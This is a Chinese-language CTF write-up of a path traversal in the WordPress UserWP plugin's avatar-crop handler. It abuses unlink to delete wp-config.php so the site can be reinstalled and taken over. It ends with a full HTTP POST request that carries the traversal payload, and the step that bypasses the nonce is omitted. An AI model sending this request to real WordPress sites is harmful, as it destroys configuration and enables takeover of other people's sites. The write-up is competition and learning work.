www.zip。题目给了hint
userwp插件洞。。unlink rce
思路就是userwp unlink 删除一个config.php 重装rce
全局搜unlink。就三个点。一个
data:image/s3,"s3://crabby-images/64b65/64b65f6d4137af6c8d795a252a8cc26fa96c67e1" alt="image-20230414212204216"
这里参数是定死的。没办法。
data:image/s3,"s3://crabby-images/a9de6/a9de6f2b93a9006668f58add8721e78666bb4fe3" alt="image-20230414212302777"
接下来两个都是漏洞点。
直接反推过去。
data:image/s3,"s3://crabby-images/a8c34/a8c346c36fe336dfcb50875f485aeaeb8ff2d1cf" alt="image-20230414212421931"
红框中的是一个sign校验。可以构造。先不管,下面POST的uwp_crop直接传参给$image_url
data:image/s3,"s3://crabby-images/33b6c/33b6cf0c2e8138dc73fd40a2fa463d44d939cd95" alt="image-20230414212444085"
下面就用pathinfo对$image_url
获取ext和name。传入1.php就会变成1_uwp_avatar_thumb.php
data:image/s3,"s3://crabby-images/f4bf8/f4bf8f61c37bd75d10fdf9735bfbc9961c99d2d4" alt="image-20230414212542418"
然后传入uwp_resizeThumbnailImage。函数内容就是返回第一个参数。。不用多看
data:image/s3,"s3://crabby-images/50f79/50f795aa734cc618ea21b57785b80f2ae048d030" alt="image-20230414212745364"
所以上面传入1.php会变成1_uwp_avatar_thumb.php。怎么删除config.php呢。
注意这里str_replace。会把$upload_url
替换为空。
data:image/s3,"s3://crabby-images/610ba/610baa424c4aaced2bfe7e772d6aa85e343c69da" alt="image-20230414212831318"
是把http://host/
替换为空
data:image/s3,"s3://crabby-images/d9994/d9994d2a9f1a08ab0f6f50dec49894b3b93ca70b" alt="image-20230414212935548"
data:image/s3,"s3://crabby-images/9bd34/9bd34a6a6d7028ae89977e82079126dd42161990" alt="image-20230414214420396"
data:image/s3,"s3://crabby-images/ff948/ff9489a83942d4ed477352e67affc4f2b665ef56" alt="image-20230414214431799"
/../../../../../config.http://127.0.0.1/wp-content/uploadsphp
经过pathinfo时。解析为
array(3) {
["dirname"]=>
string(50) "/../../../../../config.http://127.0.0.1/wp-content"
["basename"]=>
string(10) "uploadsphp"
["filename"]=>
string(10) "uploadsphp"
}
没有Ext了。也就变成了把
uploadsphp. 替换成1_uwp_avatar_thumb.php
由于http://127.0.0.1/wp-content/uploads。这个之后会被替换为空的内容存在。所以没被替换。
然后到了
$cropped = str_replace( $upload_url, '', $cropped );
替换掉了http://127.0.0.1/wp-content/uploads。url又变成了../../../../../config.php
最终忽略掉wp_verify_nonce的exp。wp_verify_nonce是队友调的。懒得写了
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_5c016e8f0f95f039102cbe8366c5c7f3=test%7C1681652395%7CqtCZU9g4soL133lLkf1pnUbt6zBWpoOCSKthvD3N9ML%7C3a29c08073c831573e877b8dee2e70020332c26d0b91d2f5f319eac5180fd6bc
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
action=uwp_ajax_login_form&uwp_avatar_crop=1&uwp_crop=/../../../wp-config.http://127.0.0.1/wp-content/uploadsphp
最后http://127.0.0.1/wp-admin/setup-config.php?step=1&language=zh_CN
重装数据库。登录后台应该就能RCE了。比赛的时候。最后十分钟调出来了。题目不出网bootstrap转半天。。还没拿到nonce就结束了。